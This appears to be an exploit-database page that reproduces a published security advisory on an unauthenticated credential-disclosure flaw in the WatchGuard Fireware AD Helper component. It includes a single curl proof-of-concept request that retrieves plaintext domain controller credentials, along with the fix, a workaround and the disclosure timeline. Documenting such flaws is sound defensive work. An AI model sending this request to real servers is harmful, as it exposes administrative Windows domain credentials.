Search for hundreds of thousands of exploits

"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure"

Author

Exploit author

"RedTeam Pentesting GmbH"

Platform

Exploit platform

java

Release date

Exploit published date

2020-03-12

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
# Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure 
# Author: RedTeam Pentesting GmbH
# Date: 2020-03-11
# Vendor: https://www.watchguard.com
# Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
# CVE: N/A

Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component

RedTeam Pentesting discovered a credential-disclosure vulnerability in
the AD Helper component of the WatchGuard Fireware Threat Detection and
Response (TDR) service, which allows unauthenticated attackers to gain
Active Directory credentials for a Windows domain in plaintext.


Details
=======

Product: WatchGuard Fireware AD Helper Component
Affected Versions: 5.8.5.10233, < 5.8.5.10317
Fixed Versions: 5.8.5.10317
Vulnerability Type: Information Disclosure
Security Risk: high
Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

"Threat Detection and Response (TDR) is a cloud-based subscription
service that integrates with your Firebox to minimize the consequences
of data breaches and penetrations through early detection and automated
remediation of security threats."

"Threat Detection and Response includes the AD Helper component. If your
network has an Active Directory server, you can install AD Helper to
manage automated installation and updates of Host Sensors on your
network."

(from the vendor's homepage)


More Details
============

By accessing the AD Helper's web interface, it was discovered that a
call to an API endpoint is made, which responds with plaintext
credentials to all configured domain controllers. There is no
authentication needed to use the described interface and the
installation instructions at [1] contain no indication of any way to
configure access control.


Proof of Concept
================

An HTTP GET request to the path "/domains/list" of the AD Helper
API returns, among others, the plaintext credentials to
all configured Windows domain controllers:

------------------------------------------------------------------------
$ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq .

{
  "content": [
    {
      "id": 1,
      "fullyQualifiedName": "example.com",
      "logonDomain": "example.com",
      "domainControllers": "dc1.example.com",
      "username": "[DOMAIN_USER]",
      "password": "[DOMAIN_PASSWORD]",
      "uuid": "[...]",
      "servers": [
        {
          [...]
        }
      ]
    }
  ],
  "totalPages": 1,
  "totalElements": 1,
  "number": 0,
  "numberOfElements": 1
}
------------------------------------------------------------------------

The same request and its response can be observed when initially accessing
the web interface. The discovered version of AD Helper responds with
the following server banner:

------------------------------------------------------------------------
jetty(winstone-5.8.5.10233-9.4.12.v20180830)
------------------------------------------------------------------------

It is likely that other versions of the AD Helper Component are
vulnerable as well.


Workaround
==========

Ensure API of the AD Helper Component is not reachable over the network,
for example by putting it behind a Firewall.


Fix
===

Update to Version 5.8.5.10317 or later.


Security Risk
=============

No authentication is needed to access AD Helper's web interface and the
installation instructions at [1] describe that configured domain user
accounts must possess at least the following privileges:

 * Connect to the host
 * Mount the share ADMIN$
 * Create a file on the host
 * Execute commands on the host
 * Install software on the host

Access to the "ADMIN$" share implies a user with administrative
privileges. Therefore, this vulnerability poses a high risk.


Timeline
========

2020-02-12 Vulnerability identified
2020-02-19 Customer approved disclosure to vendor
2020-02-24 Tried to contact the German branch of WatchGuard
2020-02-27 Contacted the Dutch branch of WatchGuard
2020-02-28 Contact to ADHelper QA Team Lead established
2020-03-02 Advisory draft sent for verification
2020-03-10 Vendor released fixed version and blog post
2020-03-11 CVE ID requested
2020-03-11 Advisory released


References
==========

[1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/
Release DateTitleTypePlatformAuthor
2020-07-02"WhatsApp Remote Code Execution - Paper"webappsandroid"ashu Jaiswal"
2020-07-02"ZenTao Pro 8.8.2 - Command Injection"webappsphp"Daniel MonzΓ³n"
2020-07-02"OCS Inventory NG 2.7 - Remote Code Execution"webappsmultipleAskar
2020-07-01"Online Shopping Portal 3.1 - Authentication Bypass"webappsphp"Ümit Yalçın"
2020-07-01"e-learning Php Script 0.1.0 - 'search' SQL Injection"webappsphpKeopssGroup0day_Inc
2020-07-01"PHP-Fusion 9.03.60 - PHP Object Injection"webappsphpcoiffeur
2020-07-01"RM Downloader 2.50.60 2006.06.23 - 'Load' Local Buffer Overflow (EggHunter) (SEH) (PoC)"localwindows"Paras Bhatia"
2020-06-30"Reside Property Management 3.0 - 'profile' SQL Injection"webappsphp"Behzad Khalifeh"
2020-06-30"Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting"webappsphp"Anushree Priyadarshini"
2020-06-26"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path"localwindows"Ethan Seow"
Release DateTitleTypePlatformAuthor
2020-03-12"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure"webappsjava"RedTeam Pentesting GmbH"
2016-12-23"Apache mod_session_crypto - Padding Oracle"webappsmultiple"RedTeam Pentesting GmbH"
2016-06-02"Websockify (C Implementation) 0.8.0 - Buffer Overflow (PoC)"dosmultiple"RedTeam Pentesting GmbH"
2016-06-02"Relay Ajax Directory Manager relayb01-071706/1.5.1/1.5.3 - Arbitrary File Upload"webappsphp"RedTeam Pentesting GmbH"
2014-05-28"webEdition CMS - 'we_fs.php' SQL Injection"webappsphp"RedTeam Pentesting GmbH"
2013-05-07"Dovecot with Exim - 'sender_address' Remote Command Execution"remotelinux"RedTeam Pentesting GmbH"
2011-12-15"Owl Intranet Engine 1.00 - 'userid' Authentication Bypass"webappsphp"RedTeam Pentesting GmbH"
2011-03-15"SugarCRM 6.1.1 - Information Disclosure"webappsphp"RedTeam Pentesting GmbH"
2011-03-05"nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution"remotelinux"RedTeam Pentesting GmbH"
2010-01-27"Geo++ GNCASTER 1.4.0.7 - GET Denial of Service"doslinux"RedTeam Pentesting GmbH"
2010-01-27"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial of Service"doslinux"RedTeam Pentesting GmbH"
2009-08-10"Papoo 3.x - Upload Images Arbitrary File Upload"webappsphp"RedTeam Pentesting GmbH"
2009-05-05"IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Cross-Site Scripting"webappsphp"RedTeam Pentesting GmbH"
2009-05-05"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting"webappsphp"RedTeam Pentesting GmbH"
2009-05-05"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation"webappsphp"RedTeam Pentesting GmbH"
2007-09-17"Alcatel-Lucent OmniPCX Enterprise 7.1 - Remote Command Execution"webappscgi"RedTeam Pentesting GmbH"
2007-07-03"Fujitsu ServerView 4.50.8 - DBASCIIAccess Remote Command Execution"remotemultiple"RedTeam Pentesting GmbH"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/48203/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.